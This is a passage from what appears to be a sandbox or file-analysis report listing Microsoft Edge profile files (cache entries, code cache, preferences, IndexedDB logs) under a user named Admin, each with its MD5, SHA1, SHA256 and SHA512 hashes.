| SHA512 | fc41f141b1b92f548451afbbf0bbd3e033428f8a112bc272ec8262f0dec5cffab4914c8382d226b3022ddc0bd18af7e0d37c464295e4ed05f6b9deb4266118ba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f
| MD5 | 73114278e36c204bb6b54586df76114f |
| SHA1 | 8598259fbf0297acfa57c3d3fc2552cd542d17db |
| SHA256 | 91b29b52846728e2b8c308bdf1dc681223aaff0f0ea63b6860a6688975ca1fcd |
| SHA512 | fab484f8693bb4c91d0586c17eef85dadbaf8219b38f33f6b7d6bd439b1109d6579c484bc137a45853cc809f039325fd217b6bfea72fb0ab6b5ed0db0c5ac886 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e
| MD5 | 4bdabc799a50f4cb28e7bb018a885ff0 |
| SHA1 | adc1c1086d5a92af7d570ee2ce8ad497be92b78a |
| SHA256 | 4813cbd8e1d728cf79a458ddd0fbe693967197a02d8b44b36a63c9001916a7f2 |
| SHA512 | 5716d45c33a640e20c4a0d59b3ca3d559c645b28dd9eadfd7ae619e328966d42201700e21ea7f3beea186a027fea5a25b45d9eb443cb5bac3e106ba36daa3c7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019
| MD5 | 127b7a9f7009939d0ae5dd1a48386985 |
| SHA1 | f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac |
| SHA256 | 9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962 |
| SHA512 | b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a
| MD5 | f1835bee43eb0d3d612f66e06ff4bda5 |
| SHA1 | d3cfde687ff861ffe9e5eab708dafea3374eaf3b |
| SHA256 | 150991463676ba1d0dfc77e7dc1cf9820264e52aeb620558aff0cdf9ff1e1914 |
| SHA512 | 499051a8b1e65ff71e27547b4ede86b8b7d96c2b43843aa44f899d32b578d4e6d5e6838201cd39218eb1720af29b5f641dde386ab81cfd948c6e28f1ff9bb885 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b
| MD5 | f03b625b41e6669d63dd48c535134432 |
| SHA1 | d09c27990544a1694e0541ecccd0d7095d8af953 |
| SHA256 | 827f422d8f2a5181e9f316c0b7e076a45d72367c47d8b765d4e811fc75e4fa40 |
| SHA512 | d34528736eb3767d8b0a9fcc533cbaf5d87cbd0726a2e251934dd3253070848df9e3e2e1b1b54a6b1e967383b8d289bcf31cf1a9ed0b11a7f7a335dcb1592f25 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d
| MD5 | 4e0fd939c1a363d23ccae3d7929df599 |
| SHA1 | 599ce43eebeb61aa36c08116ba84fcc81ea499aa |
| SHA256 | 33f2573ae756a04677c62a4a3953160c169226145256d90b0443f0074fe2522d |
| SHA512 | 7e269353327b150346b4601a92ff91f6ebfce2004b62f03ed55f977b9ce9a520ede65940eadb85b007e0a6778c7af48d4cf38c028c168e8962cb56388ceeb2f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | ae5f8a8c3ba96d1e29479bc4fb5be5a4 |
| SHA1 | db21914dc1f9d4842e094e9f815af38770044532 |
| SHA256 | 9b2683a80d27f4cee4c10299fb1f2952742baca99064611f642dec8d1680a730 |
| SHA512 | 0e29cfa6f85a3ce67f08b00badbdf952d5e3b1dd8fa23d58715a92b0e77bc6d4b36465b5715c15f93d24c19c4af9b84eeb4108fa403d2d3497473e9d25ed6a70 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | fd029b581aa2c1774d4ad07560ec13c9 |
| SHA1 | 2b12ab41182d53c718f2e8baecacb329169df182 |
| SHA256 | 908da661a85392d485dc5149310e222b94163f6f2db4192968bf272e5d71d64d |
| SHA512 | f45a53e1e3e57011058305958fbb7c16efed898c6388b20e783b5b5c63322fa0f14dd60250b103916fe8215999c3555c5e763566f3b6f140a0993d330a458fde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old~RFe5a8adc.TMP
| MD5 | c29e1fcf30c9a4d71e88443805f2dd85 |
| SHA1 | ec823aa1adb4a207877101cf1574a17ef332d155 |
| SHA256 | bd528c407c413d0a5aa27026175390c9ab2818027d23cd62b4b426f185c55ab3 |
| SHA512 | 6c8cc46a0bb1ae875df188eb3b5e68837816e13e6f85b3494afbd38c288a380492588913cea2263fabf68de851b2f45c5bc55e10d8f09e6d09511c856dc32ebc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
| MD5 | d2fa74eca9d32a4d2e972aac6374e508 |
| SHA1 | 44d505f520ec8840633b7ec0534a98a135f0c261 |
| SHA256 | ef08e7461ad13377993a74ae88ea9afcac9d54c3051fc9291cdc1df89ff339ef |
| SHA512 | a6c545da622f610d174431ef09cd466834bf47c14fd9cfa6571a4207452844a161958adf6c30370facae99a446fb7d0a33ef0d6745024430c9c977043ab00f47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0cec5e31020f6573fe8753827cfbf3ce |
| SHA1 | 723aa1319ccf7173733770d012b1c738c8534491 |
| SHA256 | 3b4dbaea414400fe85349c9c1c5386d54a8141f7f23b163ce3c46f42cd470955 |
| SHA512 | a5d8d05d511691891f756d0aa3aa3df110fed3e2db6f4d21e831f6f7cda78ca4d3ada139ac1e5948df680e88bb659b51deadedfb5b35818a2ad2f41090b7d638 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000003.log
| MD5 | c8f02f64f7f1789d10d43d73fff8be13 |
| SHA1 | af1bd6c9549f229f42ca81c694d7cbd47c579d3e |
| SHA256 | 42052cc2172b162a6278d826b54f335180d07c11b0eefd9f796efb4707b487e0 |
| SHA512 | f928e11a7507895f79a0e488d0e8703c1eebb76e33ba30530c8360abdb96463c6e58143558fd0b2cca44eb87e664f0439a255a40af45b69e918890e2a11cb59c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 55707d59c151622b8b6f73b3ec748840 |
| SHA1 | 469dd2fb8ae0bf0a166b046831473f1e145da7f2 |
| SHA256 | 51604ae27b0f6d9adb2cf911128f2f5bc43e3f5f1ebf95b64c5d99a091bad96a |
| SHA512 | 89deb5df97f040a372fb71a01edbf79592f0d349e153028b1dc7250f6b62e948d944fa173fb0678394fde45a91b5da0959c03207ef1b3adf8f1dc57136f2d3b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | e27ecb134987b3be8fb7f325d8fb4a22 |
| SHA1 | 0b27e4afa4ba769fd3e2bf8b424235b9ac855d97 |
| SHA256 | 98a6f52fbfde890d37c28e47cf960131a7ea1074dc8d5d436a73d209640863fa |
| SHA512 | 7ad26daea91e32daa6c12b19519f1a207d1616689cad9844282c19611bde6704508ea15c6cc155a244afbf4a950cffd859648b290969a84c4d9dadeeb72bd87b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | dcc4187debd3e73766fa9c72240c373e |
| SHA1 | bafd3c00a49f65c56be1faa2a474fd88ef86f05d |
| SHA256 | e759fa55a00514e3d78f347b019f4b7349e2b11c77045764329307cd49bc790f |
| SHA512 | 7171a18b523e75c8bcf582b29f19994f850e326cff43e6455711fcb3804bc270a56f09681a31c2e6bfa5a5dff6c56e15390eb6e4f3fad907fd925bc2ae44981c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 20a832c486a74f4fa1b77b1069f6fc58 |
| SHA1 | aa20cb39e46513248ed0cc82b3bf2b90c70d9e29 |
| SHA256 | 55093cd79454608a7c8a19774c21bc3944406f1eb424105e5aabe035cdb3792f |
| SHA512 | b5336f6741d4e7c6a37044d915a9cbc9fd65e16a5061c9ce8b85508a9c2dc06a84cfd7949bd775e98ef4225867a8b3f38efcb71edbad91c4548d18004e4c968a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 148241c5976df8ef42c797ac04f49cf8 |
| SHA1 | dd33a5204df7c57047df6290640d950890a89c1c |
| SHA256 | 95bcb9488c2af12d1c3aa30e075823b4dff4efeafa3db5dea641ca16286c08b8 |
| SHA512 | a86152c95a506228522087e92c08dcad14a034de7637d35f8e6656dac2451b3d009936443e7edecab7281f9be5a30992a07f281c158fd1c8b2071529856d082b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000056
| MD5 | 1721006aa7e52dafddd68998f1ca9ac0 |
| SHA1 | 884e3081a1227cd1ed4ec63fb0a98bec572165ba |
| SHA256 | c16e012546b3d1ef206a1ecbbb7bf8b5dfd0c13cfeb3bdc8af8c11eaa9da8b84 |
| SHA512 | ff7bfd489dc8c5001eea8f823e5ec7abf134e8ad52ee9544a8f4c20800cb67a724ec157ca8f4c434a94262a8e07c3452b6ad994510b2b9118c78e2f53d75a493 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049
| MD5 | 086122a4bfb7a51510e3f0f0358446c2 |
| SHA1 | 409d7940193c0a6201fb28376f9ca1ec4e09d979 |
| SHA256 | 3c982a4b7283f4a728760190c40feaef16cceafab2f04f372c7848ff1b65c270 |
| SHA512 | 1db1eb3cc8fa2fea162297b95d6f9d5fff99d2ddecb2e5a70eee014585f6c51550816dff2b295aa268e7040c5414c89c6c7d45f0c924a612dd98ff4e7974c309 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d
| MD5 | 6351ed39b222eb879b007399ba302bb4 |
| SHA1 | dd337a61210f5b131aeafa82877ec326d66aa0d9 |
| SHA256 | d2d9005faab30f8724eb2b0f270168501d38a65860c012061c4b4e34d1406ba2 |
| SHA512 | c58e87382315a61ff8d8c8023eb47aa794e7f2ddf803e83e2e45dab83cd1cf58288e5ed2ee9a5047876bf31388f5e4536831659bc454c130496df75015dac384 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000059
| MD5 | baa80a18dd87df5735d95654441feed0 |
| SHA1 | e600bd34f9822eacbe76dccac24d70178a839d2c |
| SHA256 | cd12b1ca0960d19a282b891a804a3c21729d00ef26ea23b674e908465d4a691a |
| SHA512 | ba381c34f3be056d6d44debc209d97921c2bdd8e3af66a8a899e4ba2b67d163395789e32aae31ee80c7d0d0c35685c01d1e734ebcb7645ffa54a72f0729adab2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005e
| MD5 | 9db75af2ae54430b2c88c452b4d66505 |
| SHA1 | 805a267ffe69bc89075066761742682e32461a47 |
| SHA256 | 921262b9d71dc673eed53926026576bdfd85b2f3192e12ec3931de84d48a8b33 |
| SHA512 | bacaa8f5afdca197f3642bb4f673321a6448c5e6c10cd10624cd214b3c0a0e8976d542efa2c9724360cfa7116f129b4f6a456dc3ed718cb8d75632ab55c89a44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 970c77dc0ba8845a60ed4c0377527640 |
| SHA1 | 2532e190bfc26b5ea82ab77761ee5eae4c499d9e |
| SHA256 | 902e2e16c9321fe839d389ee07e66f0dc485d5fa44c966a568d95680e3e37165 |
| SHA512 | 2a02701eaf75c05994867f3d261bdb6448b87e75a89cf21b94f52dffb0f50f17382fd0fd1900e32f0c33e0ca43d4b59c50f864f80a63d3b38a4396652b0be014 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fdf92250e0ffcf05eada6c320caa6c4d |
| SHA1 | 9c903b7594e6e0485265b7d62857584b858daa4f |
| SHA256 | c7814a49cbe941126c1a4ef78a23d54d07fae532614ad08be1cb54498125e6a4 |
| SHA512 | bf95c4689fb1428c55b90ebab58a5d13f9ac0562b3ae6cb98b33cad4f70fef36b733d582ac545c53102af91035064abdb3c254004601c3bf4bec901b88e11a1b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | a6ad06125f967a1a0816a6d88035f67c |
| SHA1 | c204065cb48fa7c59b420de07258bb6a4606ba7b |
| SHA256 | ad327aef24b432f01256077b978e28f605fc8bd0329cf0a1aa762b33ef981ae0 |
| SHA512 | 5f17b623cf153b26a7244b4969540516d0f12becfac1208e069f3b0055c2dbebb7a37bedd80ceb84d1df459ab9fa06d09830a2cd5e8396c9ad1349dfca43eebd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e
| MD5 | bcd709bd87ba943a1658a8fb588450fe |
| SHA1 | 57599251ba1c27016a5d5d937f6b549efe2cdec1 |
| SHA256 | d86116737e093cd6373383a75a576e72ca616d5050dc1980bf4305e4a24e4c9a |
| SHA512 | 71ce6c566b58c88c9bf853cc5bb27fb0b518c477ab806039d0bc6fd9b038e4df95a6050a4b9051d45c004f6b998f723fc97ed5235aaf766b6ac3b3137a0663b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c
| MD5 | cb09153ae0f969ef30c093fa4a934581 |
| SHA1 | bf864742df735c295b0e060bf4353f6c523141c5 |
| SHA256 | ee3546de764dfdf26e685a60249a7e1a52ea071fd7f433fff5cfbddbabccb553 |
| SHA512 | f03f272302643ab3d3cfcca02047c0182f3f30ef1aa269212ed7c40523a380fbd6e88c0a3cd1270a41c0360269b1756ddfb6ebed551325f78db676fbc2d52d08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050
| MD5 | 0564b5a8e203ba80cf092aa8dfb3cd06 |
| SHA1 | 7201078c0b8cb3e32e39ae5f1f448074fe6afa37 |
| SHA256 | 3cfda5ff454bd3d2bca33510f3cccb30ba40aed6e0e9c41c754466ff6ca7f15c |
| SHA512 | 86cde72670f99c98ee49613cb75eb8048ed3485b8f55b629dde25777670fd076d6eaecd1d866531a060f0e7d907028b17eefbc35f2ddfcf2c73d409dcb3965cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f
| MD5 | 4b4ca8541bd16c226334c7f9d69e38d2 |
| SHA1 | b9d3ecc23a290fd0d30d8696448c0a836ad9097e |
| SHA256 | d6332781e45dbdda8cda2167703fda5e5016b8c37d87d91a9bd9d665053eb1d8 |
| SHA512 | 6c4bd496022248df4ed6e90b27ed6690a5e7e1183fad9f2c65aa61ebb964f755eee2ab775072ee89f9d7ceeb0bb7eaf294661b6cef3def935f79ea844e089884 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\22813b72043b9677_0
| MD5 | 5457bcc699921ff4218ec7e319eba1f2 |
| SHA1 | 956fb4241de8851d48c6e7dbe6eeaf6f92f762d4 |
| SHA256 | ad8d9e5144fac37fab76ec5d6fc9df03770ef9a313cedf2e6d38df7e9c089479 |
| SHA512 | 8b150b6c61d8eaee0196a4eafce6e05086c62c0bce22ede70c84680a10fcda4a3575fb977fc778f2002ed62bd6b858063544be29753d5859955f63b2afb7f585 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5dd0ad6188a1b357_0
| MD5 | 3501e373e41e729769edbedf8abd7dac |
| SHA1 | 3202248d9ae5312fe9cd53b471ddfe1079cc2dbc |
| SHA256 | 9c8065f324a3f0b341627c667a6640d7f78e2ea7b7b3c77e7d6595a2cd0da683 |
| SHA512 | a848e44adb548b02923bb7fda01b33d2a443da6aefe4de85258b7abfc686b799337edf4e33604b5de0af297c53ac703d20d89a8a31898ba5f1493fb71ec8d3e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68c82e0a24778f12_0
| MD5 | 923b0c857235889ee63c8faf9b981622 |
| SHA1 | ee2213f9b3836209a6f104d9f9d1ecd558a6fbbe |
| SHA256 | 8911985c5dc9c2ca8ba689a7db1902069eacaa06a0665a3d756d82a8d7c5d736 |
| SHA512 | afaffc7f04c8969ec0ca23988155b7d9581a32d417b01031e6274d414877c3d86e2c705121a2044009fe0b346c47ad7ed45a3c44171d37e5d4634acf911c37e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8d0cf53909ea22dd_0
| MD5 | 97f3aa6788309c7c1fee7e12d41750c4 |
| SHA1 | de9c53f9dfefc9faa289f5c24cf54b8bcc2cbbbe |
| SHA256 | 0a8e9d63c543865bce41bbe94e3e02862a7f7d080877cf0f6c49f3658f801180 |
| SHA512 | c45fc608d2e029964352e7dc3566a589c7c8ba0cfd7d89071d19b254aa51387a6685b2ab0e9bedf2df8f2a04924d7f164a90cf8d69af7006bc56d037fc2c4c1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036
| MD5 | 656abcd278e8ccb670d731ab234f36fb |
| SHA1 | 7890827918667198da32ef043bde58935df636c2 |
| SHA256 | a00c214b105544b2f6cfd7406d5471383e41cb12b2239195a39ff20308800a47 |
| SHA512 | c68cda33ae76525b2ae541691dd3ed17e1d7d8a164c4ece93aedf3d942ae19fbcd3b150558f877b65c6e8f7c584b39ac8fc2cf4905ab60a8ff758a0377c452de |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1830cdccf2b86ddd_0
| MD5 | 6f632b2ec4e0409b4daa23a0843b29fa |
| SHA1 | 75ed4e7c8db8744315f3855e88ead1a153e3c6a5 |
| SHA256 | 1918c5f401cf1deb38beddd8ef62b5ba3ab7a928836c1799bef09dca74507a37 |
| SHA512 | 97dc378710da4a9dea677e48f7728f9d810a0c70fc07da4bf83d5480fefdee9634d8142ab9e6971b0353dc651bad8fdfb65a93820032289514e8c223724bc286 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\32cb37ab-b489-4573-a033-b4ed1f1ae092\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 803bdc9341913765ff4d36b456746c7a |
| SHA1 | 46ad593e22c74c0cd576df36b6966b44324f46a9 |
| SHA256 | dffd77be70a9f3240bcff1016f370ae8bccdd910c1825dc6921362cc9b36ab53 |
| SHA512 | 61f0ba2463d69c6bb272aefdac7a4fa498a37ec856e2318c2f893fff41837cd52aed49d1eef37a3fdd8a1391d2aeb427b194c51cf2ee2979a045289ca8d306f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\LOG.old
| MD5 | acecd47462c8a9c783a12c885eed0639 |
| SHA1 | 8a6ca9c015e000e1e501e420b963f5b2c40947b9 |
| SHA256 | cc4224fe5e3fb3be38a888a076c996d6a131052a48d1343dd224dd101d9d4c7f |
| SHA512 | dd9125bc36e6d6dadc5f9547093c2685c769374a8a8d5507b08c13105d7b1530e6c80aafbda209e07df30ed5660983f79d91affc151441b359493a86d1dd3413 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e6ca66a25a87330633f2ace1176beb4b |
| SHA1 | 1f2e20fa483caab40bb58929c8d08ac415e1efa3 |
| SHA256 | 6e0e835ce1b78e42e0f8c5c4e89cd596a75161569a054cbd0cdc12d0765d662c |
| SHA512 | 2edf40f310dfcece79dca6241b723d7a5a015d40681075fa9d95504e7abacf5676434116b6e5e90207109bd33ba1e05e9dd1d3f34309bdfaa9fefddfdf3aa86d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\dee4f29a7f0f5480_0
| MD5 | 1a7191b5a10db0b1a1717aa39154f65e |
| SHA1 | 5792a2a337a074f8ebfea2973784ea5712d3decc |
| SHA256 | c600b4733e009b5e1655454291d8c479e39c89f45773e31d745ab5e96bd70de2 |
| SHA512 | d0db1107c0a5908c8b32843c46c2e0e31bf1e8fafc20645c54b0b361073588ddb20d5c2638688af59bc6b8a4af4cc39a67128e02762976b35ae9bd397cfa2c5a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4cd463e59caa4420_0
| MD5 | 4a4983a36026dc83e812a3bf435aad79 |
| SHA1 | 947968ee82b55326059567268410bb2a65f5c8ec |
| SHA256 | e4a70329f952eca33e3a2fbaa3576a866a0496b2b6d0e8fabd218401dbc37d6d |
| SHA512 | 98db4c2d25988f39306a7e5fcfd6202a067a97102bf8e8aa9ef84d21d6c539f433a853b434b9fb6243d2f87b5ec7fce9bf3c7dd147813d3aba1ea5e9cc16eeca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\36272a3a395a4b28_0
| MD5 | 2d27ee0aba4b8c10aea557dcf4502f20 |
| SHA1 | ac0c0abb0a1704a10b0e4de07dbafe4b3e47e450 |
| SHA256 | 22854f750196aa907eabea8052b83a672e6a33ee7f9233f4a19acb5354921aa7 |
| SHA512 | b15b64dc987230c347f617b10fe121b4a9a3d158fbb464e2586f19d2e121a6206c740b646f1ad0058c8d1bcc53b9f802742f57e317a7a8a48beab6fb269302e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\503f535d81b10699_0
| MD5 | ec34ef221291aa3d3cf90253344aed62 |
| SHA1 | ff2224fe7059ee1ebf8157b92978c45e6b67ab84 |
| SHA256 | 5f999e3bffe8a23e7f803e11a197360cb374b123a6d92c573a0d67cf7b9b0318 |
| SHA512 | e83198d105cd83e4a8805af405d202e5eaf9364106b03dde8bb54fde37427b3adabbb8127ec9944dfe607568906ae6ac32845d2258bfb7755ebc7cf84dbeafc8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\32499183bcac3c97_0
| MD5 | 30059794f39c7445cadf33630638917e |
| SHA1 | 7459901bfdba30c60fe983310057a4f25ef76196 |
| SHA256 | 3abb04348eb75f46f31a3a1192c1f9b9c63763a1e6e56511a04f9c04282e0744 |
| SHA512 | e534b68e786bc8555e9c547f01092153347ffb85219304523a3df4ac3582f05de2f01f250d8724c89c3f9822f67af7c4f86ad463cee1fcca3ecfa08b7ea32f09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\01d24d6051e13bc0_0
| MD5 | 78265e63dade6a61ea63da207127601d |
| SHA1 | e1c784bd3816eceecc980927be1bc45a27810e0d |
| SHA256 | 6295fef9acda056d703f91cfcf9525fee1aa4e5411dec4da22651d7a4ab98262 |
| SHA512 | 7671c1ba32bae370e4a6f18c68de20974979a38a481bfa9aa9c43690079fdf1a379367dec2c93198e9916681797143c8c9194db8c27a85f6e036089c17b6df68 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | b08fc77c51d26f655750954aaef669a5 |
| SHA1 | 8c46e32a417e9d3becdf2308a55d55bda556e90a |
| SHA256 | 647c42c760ace32b43891be6b94b0ac94cc6252dcf4e959b2bbed7bc3dc0cbc1 |
| SHA512 | e56cf1cbbdbcf9d145c886414b84d1da6e8ede245af68cb289c57c1e4cbecf3b69e7abbbe8a69f26fcc67d4291f1737515bb54aa2d8f148d1af6d0f9605b26df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\59565ab62866c161_0
| MD5 | f9301e6bcab137c670b3cbe19ff209ae |
| SHA1 | 8e4601870a0647fdf93783896a9d23cc2f7940f4 |
| SHA256 | f89a560a56c5a761602e4b9d6aded61c147487796bc0abaf8c6e8497a1fa0d02 |
| SHA512 | 2bbef3b73c2406a09dde169e44108882b79e870f09506f4b7409a7da7ddc0db1315519009f76fe5872184c99e45ae311beb2b413ca025f02863b65c04b90a601 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\53150769611d904d_0
| MD5 | 63b6829919c4696da60497ccf2306017 |
| SHA1 | 18ba97cf9b2796fee8d81663ca1104025c827745 |
| SHA256 | 362921074e6b115c14233a749909c10d09cc1fe89d75a5939ad6aaffff18dee1 |
| SHA512 | 38ff8d426df5b8fb8c5512025c2d204e83ee648bce2cbfe5c46fa4caeb80754e0e5f3b6fe68f040e69f5ea81c1a0cc587ef4f6e369ed7fbdedaef79c4f3490af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\335e69ddec2b9ac6_0
| MD5 | b7eaf8f63d8b6101520a152d02b139da |
| SHA1 | d59700ba8dac87874a3d8130aa70756b86ac0fe5 |
| SHA256 | 8a7a857e7283169653f1f112d43518979cbd366877cdd632646ff7d9983591f1 |
| SHA512 | 4b35256e0793c114ab7ffea97980ecc69467662dbec55a3a0827ea51033ddcc31c850bab3e2bc06fdd5e4893ea47fdb7114d5566984920e79916d8724bd16002 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e9545717e6d151d2_0
| MD5 | 8b73ab4f96a87837a753a4cff97ce44e |
| SHA1 | 195e6a444d6189dba15abd81ec1eb578db5801db |
| SHA256 | 51ef783ce3652e2b45990bd60bf820adabef5551b1cf24375c2173a4b1ddd6fd |
| SHA512 | d34f56fa8ffa9fe266910e46e4607afa31d1491aed1c33c655ec6dbd0046bbbbf3f8f6ca3d476e30b63f6603fa993ed02a43eefa48d5598c4682f25610b49454 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 15c4a9ab4e51d3e5de8f404c93d574eb |
| SHA1 | 21181ecba4119d96294e548b8b3314bd23b84f75 |
| SHA256 | 370261701ea2995dfc508c5a6bac3a5ea6223156ea6df83b77543a4fa6ff6511 |
| SHA512 | 53526283d33497a0e4f82e0be0626a3db5613b575b94fca034c7ba4356be8ffc4ba486835fc970f945b6c3ae119d7b4a38654a468e3788be9df71560084246a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | b97314ad320ba71638201dee92a08922 |
| SHA1 | 09d0e643a88dcee24c8b21dfaae80afebd970c26 |
| SHA256 | 5f4f38c8428247596df41da65278b84a69d31077052c6a03c384586df54f5b70 |
| SHA512 | 52b053b0ef9cc712b6799045a2d5c64647843ef7bfedc6698321c0f477afea8868a55e6029d9aa413bc7eab05221a721adcf08ab60179fe8a20d665e6d93e603 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6e94ece5-9f16-46e5-a609-8f5e8f214ddf.tmp
| MD5 | 4842a6b39fec93bc65191274820ba412 |
| SHA1 | c88ab1a4696cdce30447ab17de8ce795bd29db4f |
| SHA256 | ae3168a0cf49200b9e33907cfd7d62d0e6e0fb7913e6f6422c144a92e555ba7b |
| SHA512 | bdb680315b4b82ee87f100cb5966f21a910654b2d2df09ba134e7661fbd327c01460fe3edc6f25c458ef9ff0e93b0fcdc0184c051a330c22dc173107da0b042a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b3e179364cba4e07a42583b79084b506 |
| SHA1 | 2792c6b0c9be3ed2d63ff96bf18eaa7b6db1a416 |
| SHA256 | 1035a42108d4c1d4424aeddb13b2f05214cc920f2c6aa2e9cb614bab7dd8b773 |
| SHA512 | ab7cbe6c5aaaecb4c7ea02748f1c2dc3616f0533ad97e1376b7da7e1f716b21458c8d0adf45b68dcf7b94d6cc007373595156ea80dc1e6670d187e59b98c93e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0a02ba264f938658e5f92222dc8bc13a |
| SHA1 | 3392f816f7243ae4a7c80fbe405c0fb8f4e274b0 |
| SHA256 | 171be2749a78fb58423dfc7cb97aa1a465e493ce0d186c6ff22f16d1ef192a92 |
| SHA512 | 0d91585767a551649afb70f754b4d3bf14cb4051bf5a208ba795798646f1c3987828b2b531b46c46db1296f626808be860b0ead9620cd6219caf87b856a00210 |
